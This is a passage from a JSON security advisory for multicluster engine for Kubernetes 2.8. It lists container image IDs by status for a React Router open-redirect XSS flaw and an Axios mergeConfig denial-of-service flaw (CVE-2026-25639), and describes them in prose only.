"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
